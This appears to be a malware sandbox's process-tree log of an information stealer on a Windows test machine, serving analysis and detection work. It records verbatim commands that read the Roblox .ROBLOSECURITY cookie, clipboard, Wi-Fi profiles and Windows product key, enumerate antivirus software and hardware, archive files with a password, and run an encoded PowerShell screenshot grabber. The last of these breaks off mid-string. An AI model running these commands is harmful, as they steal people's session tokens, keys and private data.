C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:6048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2180 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exe a -r -hp"sn" "C:\Users\Admin\AppData\Local\Temp\Jmd7I.zip" *"4⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exe a -r -hp"sn" "C:\Users\Admin\AppData\Local\Temp\Jmd7I.zip" *5⤵
- Executes dropped EXE
PID:4824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:4180
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:2880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:2684
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5208
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5944
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:5388
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:5884
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵
- Suspicious behavior: EnumeratesProcesses
PID:5920 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:1460
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:5124 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:5344
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2936 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1836
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:760 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:5176
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:5464
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:1624
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵PID:3048
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵PID:3104
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2612
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:2904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3628
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵PID:3800
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:2868
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:1364 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:3716
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:1688
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:3684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Command and Scripting Interpreter: PowerShell
PID:4012 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t3xvy5vq\t3xvy5vq.cmdline"6⤵PID:3820
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEB0.tmp" "c:\Users\Admin\AppData\Local\Temp\t3xvy5vq\CSCB2A192EA900C449BA9A3BB2314B68092.TMP"7⤵PID:3120
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3416
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3380
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:3728
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:1516 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:6116
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:1424
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:5140
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1336
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:456
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1208
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:3148 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:5500
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3236
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:316
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3848
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:3548
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:964
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:5368
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:5904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"4⤵PID:5248
-
C:\Windows\system32\getmac.exegetmac5⤵PID:4980
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exe a -r -hp"sn" "C:\Users\Admin\AppData\Local\Temp\4w1SL.zip" *"4⤵PID:4452
-
C:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI47722\rar.exe a -r -hp"sn" "C:\Users\Admin\AppData\Local\Temp\4w1SL.zip" *5⤵
- Executes dropped EXE
PID:6080 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:4720
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:3796
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:2192
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:5880
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:5944
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:1052
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"4⤵PID:6016
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER5⤵PID:3116
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵PID:5088
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
PID:4628 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"4⤵PID:676
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault5⤵PID:3776
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2788
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:1652 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:1948
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5708 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:4388
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:5204
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵PID:4968
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵PID:5332
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3144
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5436 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:3320
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5176
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵PID:3360
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5060 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵PID:5776
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
PID:2932 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵PID:1000
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵PID:432
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcA